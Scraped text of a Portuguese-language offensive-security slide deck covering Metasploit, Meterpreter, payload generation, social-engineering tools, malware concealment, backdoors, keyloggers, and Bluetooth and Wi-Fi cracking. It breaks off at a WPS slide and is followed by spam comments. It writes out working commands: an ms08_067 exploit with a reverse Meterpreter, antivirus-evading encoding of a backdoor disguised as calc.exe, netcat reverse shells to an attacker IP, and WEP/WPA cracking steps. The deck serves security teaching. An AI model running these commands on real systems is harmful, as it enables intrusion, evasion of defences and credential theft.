Variáveis do Metasploit São usadas em todos os comandos do MSF. Ex: msfconsole, msfcli, msfpayload, etc. As principais são: • LHOST -> IP local • LPORT -> Porta local • RHOST -> IP remoto • PAYLOAD -> Tipo de payload • TARGET -> Tipo de alvo Marcos Flávio Araújo Assunção

Msfconsole Método mais utilizado para uso do MSF. É um console que permite escolher interativamente exploits, utilitários, payloads e configurar as devidas variáveis. Marcos Flávio Araújo Assunção

Comandos do MSFCONSOLE • search <nome> -> Pesquisa módulo de exploit • use <nome> -> Utiliza módulo de exploit • show <argumento> -> Mostra informações referentes ao módulo. O argumento pode ser: exploits, options, payloads ou auxiliares. • set <variável> -> Configura um valor em uma variável. Ex: LHOST, LPORT, PAYLOAD, etc. • unset <variável> -> “Desconfigura” uma variável. • exploit -> Realiza a exploração após as variáveis terem sido configuradas. Marcos Flávio Araújo Assunção

MSFConsole – Exemplo search search ms12 Marcos Flávio Araújo Assunção

MSFConsole – Exemplo use use exploit/windows/smb/ms08_06_netapi Marcos Flávio Araújo Assunção

MSFConsole – Exemplo show show payloads Marcos Flávio Araújo Assunção

MSFConsole – Exemplo set set LHOST 192.168.10.1 set LPORT 443 set RHOST 192.168.10.2 Marcos Flávio Araújo Assunção

MSFConsole – set payload e show options set PAYLOAD windows/meterpreter/reverse_tcp show options Marcos Flávio Araújo Assunção

MSFConsole - Exploit Depois de todas as variáveis já devidamente configuradas para executar o comando exploit para realizar a exploração Marcos Flávio Araújo Assunção

Meterpreter Marcos Flávio Araújo Assunção

Meterpreter O MSF trabalha com vários tipos de payloads, mas o melhor de todos é o meterpreter. Algumas características dele: • Roda diretamente na memória RAM, sem uso do disco. • Permite a execução de diversas tarefas como (shell, download e upload de arquivos, keylogger, sniffer, screenshot, RDP, etc). • Permite migrar o processo para outro executável e inicializar com o sistema • Permite limpar os rastros nos logs e finalizar anti-vírus • Permite elevar os privilégios de usuário Marcos Flávio Araújo Assunção

Alguns comandos do Meterpreter • ps -> Lista processos em execução • shell -> Acessa o prompt de comandos • clearev -> Limpa os logs. • run vnc -> Instala o VNC remotamente. • getsystem -> Obtém o usuário system. • keyscan_start -> Inicia o keylogger. • migrate -> Migra para outro processo. • run migrate -> Migra automaticamente • screenshot -> Tira um screenshot da tela • download -> Faz download de um arquivo Marcos Flávio Araújo Assunção

Meterpreter – Exemplo ps Marcos Flávio Araújo Assunção

Meterpreter – Exemplo migrate Marcos Flávio Araújo Assunção

Meterpreter – Exemplos pwd e ls pwd -> Mostra diretório atual ls -> Lista arquivos/diretórios Marcos Flávio Araújo Assunção

Meterpreter – Download e Upload Sintaxe: download <arquivo> <local> upload <arquivo> <local> Marcos Flávio Araújo Assunção

Meterpreter – Listando Tokens Marcos Flávio Araújo Assunção

Meterpreter Ex: getsystem, clearev e screenshot Marcos Flávio Araújo Assunção

Meterpreter keyscan_start e sniffer_start Observação: keyscan_stop e sniffer_stop encerram as atividades. keyscan_dump obtém o arquivo com as teclas digitadas. Marcos Flávio Araújo Assunção

Meterpreter – Exemplo shell Marcos Flávio Araújo Assunção

Msfcli Marcos Flávio Araújo Assunção

Msfcli O msfcli permite fazer tudo o que o msfconsole faz mas diretamente do shell, em uma única linha de comando. É muito prático quando usado em scripts. Sintaxe: msfcli <módulo> <payload> <variáveis> <modo> Em modo normalmente utilizando a opção E para permitir a execução imediata do exploit. Marcos Flávio Araújo Assunção

Msfcli – Exemplo real msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.10.2 LHOST=192.168.10.1 LPORT=443 E No exemplo acima estamos executando o msfcli contra o host remoto (RHOST) 192.168.10.2 configurando como PAYLOAD o meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT). Marcos Flávio Araújo Assunção

Msfpayload Marcos Flávio Araújo Assunção

Msfpayload Permite converter qualquer um dos payloads do metasploit para um arquivo puro(raw) ou mesmo um executável. Isso permite que você possa utilizar o payload como um backdoor comum. Sintaxe: msfpayload <payload> <variáveis> <modo> Em modo normalmente utilizando a opção X para permitir que o payload executável seja criado. Marcos Flávio Araújo Assunção

Msfpayload msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 X > backdoor.exe No exemplo acima estamos gerando o executável backdoor.exe ao rodar o msfpayload como PAYLOAD do meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT). Se for um payload de conexão reversa é necessário um MultiHandler no MSFConsole ou MSFCli para receber a conexão de volta. No próximo slide veremos como criar um. Marcos Flávio Araújo Assunção

Multi-Handler: Msfconsole x Msfcli Marcos Flávio Araújo Assunção

Msfencode Marcos Flávio Araújo Assunção

Msfencode Permite codificar qualquer um dos payloads em arquivo puro(raw) gerados pelo msfpayload. O objetivo é fazer com que assim o payload não seja detectado por anti-vírus e ferramentas de IDS. Sintaxe: msfencode –i <arq> -e <encoder> -c <vezes> -t <modo> -o <arq> Opções mais comuns: -i -> arquivo de entrada -e -> tipo de encoder. Ex: x86/shikata_ga_nai -c -> vezes que o encoder irá codificar. -t -> tipo de arquivo gerado. Normalmente é exe. -o -> arquivo de saída -x -> executável para ser usado como base -k -> Permite execução paralela (usado com o –x). Marcos Flávio Araújo Assunção

Msfencode – Uso com arquivo raw msfencode -t exe –i backdoor.raw -o backdoor.exe -e x86/shikata_ga_nai -c 5 Marcos Flávio Araújo Assunção

Msfpayload + Msfencode (única linha) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 R > msfencode –x calc.exe -k -o calcmalvada.exe -e x86/shikata_ga_nai -c 7 –t exe Marcos Flávio Araújo Assunção

Fast-Track Marcos Flávio Araújo Assunção

Fast-Track Foi criado como um complemento para o Metasploit. Permite automatizar exploração (autopwn), realizar ataques ao lado cliente, executar SQL injection e diversas outras tarefas. Possui um modo gráfico e console. Utilizaremos somente o segundo modo. Para acessá-lo basta digitar ./fast-track.py -i Marcos Flávio Araújo Assunção

Fast-Track – Menu principal Marcos Flávio Araújo Assunção

Fast-Track - Atualização Marcos Flávio Araújo Assunção

Fast-Track - Autopwn A opção autopwn seleciona automaticamente diversos tipos de exploits e os utiliza contra o alvo, aumentando a chance da exploração ser bem sucedida. Entretanto, o autopwn é mais fácil de detectar por um sistema de IDS. Marcos Flávio Araújo Assunção

Fast-Track – NMAP Engine Marcos Flávio Araújo Assunção

Fast-Track SQL Inject Marcos Flávio Araújo Assunção

Fast-Track – SQL Inject Marcos Flávio Araújo Assunção

Fast-Track Mass Client Attack Marcos Flávio Araújo Assunção

Fast-Track – Exploits diversos Marcos Flávio Araújo Assunção

Fast-Track Binary to Hex Marcos Flávio Araújo Assunção

Fast-Track – Payload Generator Marcos Flávio Araújo Assunção

SET (Social Engineering Tool) Marcos Flávio Araújo Assunção

SET Também foi criado como um complemento para o Metasploit. Consegue criar modelos falsos de websites, enviar e-mail em massa, criar phishing, gerar documentos com falhas, criar um ataque Wireless e muito mais. Para iniciar acesse o diretório /pentest/exploits/set e digite o comando: ./set Marcos Flávio Araújo Assunção

SET – Menu principal Marcos Flávio Araújo Assunção

SET – Menu Engenharia Social Marcos Flávio Araújo Assunção

SET – Spear Phishing Marcos Flávio Araújo Assunção

SET – Mass E-mailer Marcos Flávio Araújo Assunção

SET - WebAttack Marcos Flávio Araújo Assunção

SET – Ataque autorun USB/CD Marcos Flávio Araújo Assunção

SET – Create payload and listener Marcos Flávio Araújo Assunção

SET – Java Applet Attack Marcos Flávio Araújo Assunção

SET – Ataques equipamentos Arduino Marcos Flávio Araújo Assunção

SET – Wireless Fake AP Attack Marcos Flávio Araújo Assunção

Vulnerabilidades de Malware Marcos Flávio Araújo Assunção

Definição  Malicious Software  Origem  Objetivos  Malwares passivos  Malwares ativos  Risco Marcos Flávio Araújo Assunção

Métodos de Infecção dos Malwares Marcos Flávio Araújo Assunção

E-mail  Simples  Rápido  Confiável  Contatos  Fake mail  Phishing Marcos Flávio Araújo Assunção

Messengers  MSN  ICQ  GoogleTalk  Confiabilidade  Menor desconfiança  Eficiência Marcos Flávio Araújo Assunção

Código móvel  ActiveX  Javascript  VBScript  Sites maliciosos  Navegador desatualizado Marcos Flávio Araújo Assunção

Falhas  Buffer overflows  Elevação de privilégios  SQL Injection  XSS Marcos Flávio Araújo Assunção

Mídia de armazenamento  CD  DVD  Pen-Drive  Autorun  Curiosidade  Menor desconfiança Marcos Flávio Araújo Assunção

Métodos de Ocultamento Marcos Flávio Araújo Assunção

Binders  Juntar programas  Jogo + backdoor  Execução programada  Alteração do registro  Senna Spy  Wordpad Marcos Flávio Araújo Assunção

Steganografia  Método eficiente  Burla proteções  Imagens  MP3  Binários  Espaçamento Marcos Flávio Araújo Assunção

Edição/remoção de recursos binários  Permite “mudar” a estrutura binária de um malware, dificultando detecção por AVs Marcos Flávio Araújo Assunção

Edição hexadecimal  Permite “mudar” certas strings em um software, tentando com isto dificultar a detecção por AVs Marcos Flávio Araújo Assunção

Ocultamento do Firewall      Proteção “cara-crachá” Filtro de pacotes - Spoofing - Porta de origem - Conexão reversa Sandbox - DLL injection Personal Firewall killing (processo) Tunneling - HTTP (proxy) - ICMP (ping) - DNS Marcos Flávio Araújo Assunção

Ocultamento do IDS  Assinatura  Comportamento  Fragmentação  Tunelamento  Criptografia Marcos Flávio Araújo Assunção

Ocultamento do Anti-Virus  Assinatura  Edição recursos  Editor Hexa  Compressão do executável  Polimorfismo de código Marcos Flávio Araújo Assunção

Backdoors Marcos Flávio Araújo Assunção

Definição  Porta dos fundos  Easter Egg  Senhas  Modificação de serviços originais  Criação de novo serviço Marcos Flávio Araújo Assunção

NetCat  Muito conhecido  Canivete Suiço  CryptoCat  Cliente  Serviço local  Conexão reversa Marcos Flávio Araújo Assunção

Netcat – Conexão direta Este método é relativamente o mais simples, mas também o mais facilmente detectado e impedido. O atacante já precisa possuir acesso prévio ao sistema que deseja infectar. Ele então roda o Netcat no sistema alvo, abrindo uma porta TCP e anexando um processo de shell a ela. O seguinte comando por exemplo funcionaria em sistemas Windows: nc –L –p 100 –e cmd.exe –vv A opção –d poderia ser utilizada para “esconder” o processo da console. Basta agora o atacante se conectar via telnet ou nc na porta 100 do sistema infectado. Marcos Flávio Araújo Assunção

Netcat – Conexão direta Marcos Flávio Araújo Assunção

Netcat – Conexão reversa •Nesse método o “atacante” será o servidor. O cliente inicia a conexão. • Ele deverá abrir duas portas com o Netcat, usando quaisquer números. Tudo o que for digitado pelo cliente na primeira porta, será processado pelo shell através do pipe e mostrado como resultado na segunda porta. • Usando engenharia social ou outro método, força-se o cliente a se conectar às duas portas com telnet (ou o próprio NetCat, mais recomendado no caso do Windows) • Exemplo: Vamos supor que abri as portas 79 e 53, ambas TCP, no meu sistema. Meu endereço IP é 20.0.0.1 e agora preciso que a “vítima” digite os comandos para se conectar em mim. Exemplo: telnet 20.0.0.1 79 | /bin/sh | telnet 20.0.0.1 53 (para sistemas Linux-like) Nc 20.0.0.1 79 | cmd.exe | telnet 20.0.0.1 53 (para sistemas Windows) Marcos Flávio Araújo Assunção

Netcat – Conexão reversa Marcos Flávio Araújo Assunção

Tunelamento ICMP - Loki  Tunelamento ICMP  ICMP_ECHO  ICMP_ECHOREPLY  Loki  Lokid Marcos Flávio Araújo Assunção

Tunelamento ICMP - ICMPCMD  Proof of concept  Sistemas Windows  Usa apenas o “ping” para se comunicar Marcos Flávio Araújo Assunção

Tunelamento HTTP - Reverse WWW Backdoor  The Hackers Choice  “Placing Backdoors througt Firewalls”  Proof of Concept  Tunelamento  HTTP  Proxy Marcos Flávio Araújo Assunção

Cavalos de Tróia Marcos Flávio Araújo Assunção

Definição  Objetivo  Tróia  Binders  Windows  Primeira geração  Segunda geração  Terceira geração Marcos Flávio Araújo Assunção

Back Orifice  Cult of dead cow  1997  Primeira geração  Windows 9x  Conexão comum  Sem opção de alerta  Plug-ins Marcos Flávio Araújo Assunção

Netbus  Carl Frederik  1998  Primeira geração  Windows 9x e NT  Conexão comum  Alerta por e-mail  Sem plug-ins Marcos Flávio Araújo Assunção

SubSeven 2.1  2000  Segunda geração  Windows 9x e NT  Conexão comum  Alerta por e-mail, ICQ e IRC  Plug-ins  Scanner remoto Marcos Flávio Araújo Assunção

Beast  2003  Terceira Geração  Conexão comum e reversa  Keylogger  Screenlogger  DLL Injection  Firewall killing Marcos Flávio Araújo Assunção

Beast realizando conexão reversa Marcos Flávio Araújo Assunção

Poison Ivy  2005  Terceira Geração  Conexão comum e reversa  Tunelament o  Criptografia  Webcam  Farejamento remoto Marcos Flávio Araújo Assunção

Rootkits Marcos Flávio Araújo Assunção

Definição  “Kit do root”  Propagação  Esconde informações vitais  Nível de Aplicação  Nível de Biblioteca  Nível de Kernek  Nível de Virtualização Marcos Flávio Araújo Assunção

Hacker Defender  2002  HxDef  Morphine  Baseado em kernel  Arquivos  Processos  Pastas  Conexões Marcos Flávio Araújo Assunção

AFX Rootkit  2005  APIs do Windows  Baseado em biblioteca  Processos  Serviços  Conexões  Ícones  Arquivos Marcos Flávio Araújo Assunção

Keyloggers Marcos Flávio Araújo Assunção

Definição de Keylogger  Captura do teclado  Interrupção  Mensagens  Keyloggers locais  Keyloggers com envio remoto  Keyloggers físicos Marcos Flávio Araújo Assunção

Home Keylogger  Local  Simples  Fácil utilização  Não é detectado  Grava em um arquivo de texto comum Marcos Flávio Araújo Assunção

Spy Lantern Keylogger  Remoto  Comercial  Detectado  Criptografia  E-mail Marcos Flávio Araújo Assunção

Keylogger físico (Ghost e outros)  Necessita acesso Físico  Versões PS2 e USB  Senha para acesso ao conteúdo  Vendido em vários sites Marcos Flávio Araújo Assunção

Screenloggers Marcos Flávio Araújo Assunção

Definição  Screenshots  Visual  Remoto  Ideal para captura de teclados virtuais  Muito utilizado em vírus do tipo “Banker” Marcos Flávio Araújo Assunção

Perfect Keylogger  BlazingTools  Comercial  Grava shots no disco  Envia shots por e-mail  Instalação remota Marcos Flávio Araújo Assunção

Ardamax Keylogger  Comercial  WebUpdate  E-mail  LAN  FTP Marcos Flávio Araújo Assunção

Vulnerabilidades de BlueTooth Marcos Flávio Araújo Assunção

Ataques a Bluetooth  War-Snipping  BlueJacking  BlueSnarfing  BlueBugging  BlueSniper  Denial Marcos Flávio Araújo Assunção of Service

War-Snipping  Para descobrir dispositivos  Envia dados aleatórios(lixo) visando uma resposta qualquer do dispositivo  Permite detectar a maior parte dos dispositivos conhecidos Marcos Flávio Araújo Assunção

BlueJacking  Também chamado de BlueSpamming  Envia um VCard para outro dispositivo  No campo de identificação do nome, substitui pela mensagem  Usado para BlueDating e BlueChat Marcos Flávio Araújo Assunção

BlueSnarfing      Marcos Flávio Araújo Assunção Roubo de informações do dispositivo Contatos, calendário Calendário Problemas no protocolo OBEX (get invés de push vcard) Dispositivos mais antigos

BlueBugging  Permite acesso a comandos do celular  Mais poderoso que o BlueSnarfing  Permite fazer chamadas, enviar SMS e até ouvir conversas alheias.  Geralmente utiliza um laptop Marcos Flávio Araújo Assunção

BlueSniper O BlueTooth é realmente limitado a uma comunicação de 100 metros? Marcos Flávio Araújo Assunção

BlueSniper Marcos Flávio Araújo Assunção

BlueSniper Permite encontrar dispositivos Bluetooth a 1 Km de distância! Marcos Flávio Araújo Assunção

Vulnerabilidades de Wi-Fi Marcos Flávio Araújo Assunção

Redes 802.11 (Wi-Fi) Princípios • Frequências: 2.4GHz / 5 GHz • Canais e interferência • ESSID e BSSID • DS (Sistema de Distribuição) • IBSS ou AD-HOC • BSS • ESS • Marcos Flávio Araújo Assunção

BSS (Basic Service) • Associação “Conectar-se” ao Access Point • Autenticação OSA (Open System Authentication) SKA (Shared Key – WEP) PSK (WPA Personal - Pre-Shared Key) 802.1X (WPA Enterprise – Radius) Marcos Flávio Araújo Assunção

ESS (Extended Service) • Desassociação “Desconectar-se” de um AP e “reconectar” em outro em um ESS. Iniciado normalmente pela estação. • Desautenticação Desautenticar uma estação wi-fi. Automaticamente ela também é desassociada. Iniciado pelo AP. Marcos Flávio Araújo Assunção

Elementos de Segurança Wi-Fi • Criptografia WEP, WEP2, WEP Dinâmico WPA, WPA2 • Autenticação OSA, Shared Key (WEP), WPA-PSK, WPA-Enterprise (802.1X) • Rede invisível (ESSID oculto) • Filtro de endereços MAC • WIDS / WIPS (Wireless Intrusion Prevention System). • Outros (VLAN, proteção contra ARP no AP, etc). Marcos Flávio Araújo Assunção

Ataques à redes Wireless  Ataques à Infra-estrutura:  Negação de Serviço (DoS)  Burlando filtros de MAC  WarDriving (detecção passiva/ativa)  Ataques de criptoanálise/força-bruta:  Decriptação de IVS no WEP (Wep Cracking)  Bruteforce em handhshakes WPA  Ataques ao usuário Wi-Fi:  Rogue Access Point  Evil Twin  Ataque MITM com DNS Spoofing Marcos Flávio Araújo Assunção

WarDriving – Detectando e mapeando redes Wi-Fi Marcos Flávio Araújo Assunção

Wardriving  Mapeamento de redes wireless Usado como método de descoberta passiva de redes  Tecnicamento envolve o uso de um automóvel para gravar informações wireless sobre uma larga àrea Warflying utilizam aviões ao invés de automóveis  Wardriving em si não é uma atividade ilegal Usar o sinal de rádio para se conectar a redes sem a permissão do dono é ilegal Marcos Flávio Araújo Assunção

Hardware para o wardriving Marcos Flávio Araújo Assunção

Hardware para o Wardriving  Computadores móveis  Notebook/tablets  Smartphones  Interface  Possui de rede Wireless diversas formas e estilos  Formato USB  Placa PCI  Placa PCMCIA  Cartão CompactFlash (CF) Marcos Flávio Araújo Assunção

Hardware para o wardriving  Antenas  Anexando uma antena externa irá aumentar muito o alcance da descoberta das redes wireless  Características fundamentais  Se a frequência aumenta o comprimento de onda diminui.  Se o ganho da antena aumenta a àrea de cobertura diminui Marcos Flávio Araújo Assunção

Hardware para o wardriving  Antenas (continuação)  Categorias básicas Omni-direcional • Detecta igualmente sinais de todas as direções Semi-direcional • Foca em uma direção específica Direcional • Envia o sinal em uma direção bem definida (ângulo bem fechado) Marcos Flávio Araújo Assunção

Hardware para o wardriving Marcos Flávio Araújo Assunção

Antena e NIC sugeridos  Antena e NIC de 58dbi e 8000mw Modelo: EDUP EP-MS8515GS Chipset: Ralink 3070L e Realtek 187L Alcance do sinal: + de 5 KM Marcos Flávio Araújo Assunção

Hardware para o wardriving Marcos Flávio Araújo Assunção

Hardware para o wardriving Marcos Flávio Araújo Assunção

Softwares para o wardriving  Aplicações open-source  Kismet  Roda em sistemas Linux (existe porte para Windows)  Pode reportar dados similares ao NetStumbler  Também suporta GPS  Pode capturar pacotes e salvá-los em um arquivo  airodump-ng  Possui quase todos os recursos do Kismet (menos o GPS). Permite integração com outras ferramentas da suíte NG. Marcos Flávio Araújo Assunção

WarDriving - Kismet Marcos Flávio Araújo Assunção

WarDriving – airodump-ng Marcos Flávio Araújo Assunção

Denial of Service (Recusa de serviço) em redes Wi-Fi Marcos Flávio Araújo Assunção

Ataques Denial of Service (DoS)  Ataques DoS no Wireless  Negam o acesso de dispositivos wi-fi ao AP  Categorias  Ataques da camada física  Ataques da camada de enlace (MAC)  Ataques da camada física  Inunda o espectro com interferência eletromagnética  Para AP prevenir ao dispositivo de se comunicar com o Marcos Flávio Araújo Assunção

DoS Camada física Marcos Flávio Araújo Assunção

DoS Camada de Enlace (MAC) Marcos Flávio Araújo Assunção

Filtro de MAC e Redes ocultas Marcos Flávio Araújo Assunção

Aplicando Filtro de MAC Marcos Flávio Araújo Assunção

Trocando o MAC da estação Marcos Flávio Araújo Assunção

Filtro de MAC “burlado” Marcos Flávio Araújo Assunção

Ocultando uma rede para protegê-la Marcos Flávio Araújo Assunção

Detectando redes ocultas Mesmo que uma rede esteja oculta podemos detectar sua presença ao monitorar os probes dos dispositivos clientes no Wireshark. Isso só é possível no modo de monitoração com a interface mon0. O que é exatamente este “Modo de Monitoração”? Marcos Flávio Araújo Assunção

Modo de Monitoração Neste modo (RFMON) podemos monitorar o tráfego das redes wi-fi sem precisarmos nos associar à elas. Utilitário: airmon-ng Marcos Flávio Araújo Assunção

Descobrindo APs e estações com Airodump Permite monitorar redes wireless e capturar pacotes para serem analisados posteriormente. Consegue detectar Access Points em qualquer canal, mesmo estando “invisíveis”. Detecta também estações Wi-Fi associadas ou tentando se associar. Ou seja, as máquinas dos usuários serão detectadas. Marcos Flávio Araújo Assunção

Fundamentos e ataques a WEP Marcos Flávio Araújo Assunção

Ataques à criptografia: WEP  As vulnerabilidades são baseadas em como o WEP e a cifra RC4 são implementados  WEP só pode utilizar uma chave de 64 ou 128 bits Vetor de inicialização(IV) de 24 bits e uma chave padrão de 40 ou 104 bits  Tamanho relativamente pequeno da chave limita a sua força   Implementação do WEP cria um padrão que pode ser detectado por atacantes IVs são números de 24 bits  IVs começam a se repetir em menos de sete horas  Marcos Flávio Araújo Assunção

Vulnerabilidades do WEP  Implementação do WEP cria um padrão que pode ser detectado por atacantes (continuação)  Alguns sistemas wireless sempre começam com o mesmo IV  Colisão  Dois pacotes criptografados com o mesmo IV  Ataque de dedução de chave  Determina a chave através da análise de dois pacotes que se colidiram (mesmo IV) Marcos Flávio Araújo Assunção

WEP Hacking –Airodump Primeiramente, usamos o airodump-ng para filtrar todas as redes com criptografia WEP disponíveis. No examplo acima selecionaremos a rede com o ESSID carol para realizar o ataque. airodump-ng --encrypt wep mon0 Marcos Flávio Araújo Assunção

WEP Hacking - Airodump Na primeira imagem, rodamos o airodump-ng na interface mon0 filtrando: canal 11, bssid do AP da rede carol e salvando o resultado para o arquivo chaveWEP. Veja o resultado na segunda imagem. Agora, teremos que esperar. O campo “Data” deve capturar milhares de pacotes IVS para que seja possível realizar a decoficação. Tem como acelerar o processo? Marcos Flávio Araújo Assunção

WEP Hacking - Aireplay Utilizando o aireplay-ng nós realizamos o ataque caffelatte que pede aos dispositivos conectados à rede carol que nos enviem mais pacotes IVS. Com isso veja que temos mais de 40000 pacotes no campo #Data. É mais que suficiente para quebrar uma chave de 64 bits WEP. Marcos Flávio Araújo Assunção

WEP Hacking - Aircrack Executamos o aircrack-ng com o nome do arquivo que foi capturado pelo airodump-ng. Veja que o número de IVS já chegava a 71406. Com isso a chave foi rapidamente quebrada. A chave utilizada é porco. Marcos Flávio Araújo Assunção

Descriptografando os pacotes capturados O airdecap-ng é um utilitário que consegue descriptografar todo o tráfego armazenado em um arquivo PCAP, bastando fornecer a chave WEP ou WPA descoberta previamente. Assim, o atacante poderá utilizar o Wireshark para visualizar os dados que já foram capturados. Marcos Flávio Araújo Assunção

Fundamentos e ataques a WPA Marcos Flávio Araújo Assunção

Acesso Protegido Wi-Fi (WPA)  Padrão do 802.11i que cuida tanto da criptografia quanto da autenticação  Temporal  Chaves Key Integrity Protocol (TKIP) TKIP são conhecidas como “chave por pacote”  TKIP dinâmicamente gera uma nova chave para cada pacote criado  Previne colisões  Que era justamente uma das fraquezas principais do WEP Marcos Flávio Araújo Assunção

Acesso Protegido Wi-Fi (WPA)  Autenticação  WPA Cumprida por usar tanto o padrão IEEE 802.1x ou tecnologia de chave previamente compartilhada (PSK)  A autenticação PSK usa uma frase para gerar a chave de criptografia. Funciona como uma senha.   A frase deve ser previamente inserida em cada Access Point e dispositivo Wireless. Serve como seed para gerar matematicamente as chaves de criptografia  WPA foi elaborado para resolver as vulnerabilidades do WEP com um mínimo de inconveniência Marcos Flávio Araújo Assunção

Acesso Protegido Wi-Fi 2 (WPA2)  Segunda geração da segurança WPA  Usa o Advanced Encryption Standard (AES) para criptografia dos dados  Suporta autenticação IEEE 802.1x ou tecnologia PSK  WPA2 permite que ambas as tecnologias AES e TKIP operem na mesma rede WLAN Marcos Flávio Araújo Assunção

Configurando WPA no Roteador Marcos Flávio Araújo Assunção

WPA Hacking – Airodump Assim como fizemos com o WEP, vamos filtrar no airodump-ng todas as redes que utilizem criptografia WPA e WPA2 com o comando: airodump-ng –encrypt wpa mon0 Vamos escolher a rede com o ESSID EmpresaX para realizar o ataque. Marcos Flávio Araújo Assunção

WPA Hacking – Airodump Também da mesma forma filtraremos no airodump-ng: canal 6, o bssid da rede EmpresaX e salvaremos o resultado no arquivo chaveWPA. Tudo isso deve ser feito na interface mon0. Comando: airodump-ng –c 6 –bssid 50:CC:F8:85:ED:B2 –w chaveWPA mon0 O próximo passo é capturar o handshake do WPA. Isso só é possível quando algum cliente se conectar na rede. Podemos acelerar esse processo deautenticando os usuários com o aireplay Marcos Flávio Araújo Assunção

WPA Hacking – Aireplay Utilizamos no aireplay o MAC do AP (-a) e o MAC do cliente (-c) que foi detectado no airodump. Enviamos 5 pacotes de desassociação . Verifique no airodump que o WPA Handshake foi capturado. Marcos Flávio Araújo Assunção

Handshake WPA Verifique no airodump que o WPA Handshake foi capturado. O que fazer com isto? Entra agora o processo de força-bruta. Marcos Flávio Araújo Assunção

WPA Hacking – Aircrack-ng Primeiramente, ao contrário do WEP, precisamos ter uma wordlist (lista de palavras) para tentar realizar a força-bruta no handshake WPA que foi capturado. Uma rainbow table pode ser usada para acelerar o processo. O BackTrack Linux já possui uma lista gigantesca no arquivo /pentest/passwords/wordlists/rockyou.txt (mais de 100 MB) Marcos Flávio Araújo Assunção

Aircrack – Força-Bruta na chave A chave foi descoberta. É nossoprecioso Marcos Flávio Araújo Assunção

WPS – Wireless Protected Setup Marcos Flávio Araújo Assunção

WPA Hacking – WPS PIN Hacking O PIN foi configurado para o Wi-Fi Prote

#add presentations

Add a comment

Comments

Tynctansisa | 04/01/17
http://boneheadedness.xyz/ Norsk casino
Tynctansisa | 26/01/17
http://boneheadedness.xyz/ Norsk casino

Related presentations

Related pages

Computer security and ethical hacking slide ppt - WizIQ

This is a presentation slide for basic computer security and ethical hacking process.
Read more

El curso mas impactante de Ethical Hacking - YouTube

Los creadores de la Red Social Incube2, estarán ofreciendo un adiestramiento de Ethical Hacking Completo a través de www.incube2.com.
Read more

PPT – Ethical Hacking PowerPoint presentation | free to ...

Chart and Diagram Slides for PowerPoint - Beautifully ... ETHICAL HACKING A LICENCE TO HACK - ETHICAL ... EC Council's Certified Ethical ...
Read more

Ethical Hacking Powerpoint Slide Download - 455391

Hands-On Ethical Hacking and ... This ppt file is prepared as a sample of PPT Presentation Slide File we will prepare for you ... Ethical Issues in ...
Read more

Ethical Hacking Tricks Hacking Powerpoint Templates ...

Download Ethical Hacking Tricks &Buddhist Powerpoint Templates: Are you looking For Ethical Hacking Powerpoint Template, Ethical Hacking Powerpoint ...
Read more

TM C E H - Certified Ethical Hacker, Information Security ...

TM C E H TM Certified Ethical Hacker ... Ethical Hacking and Countermeasures course mission ... The comprehensive instructor slides and student manual in .
Read more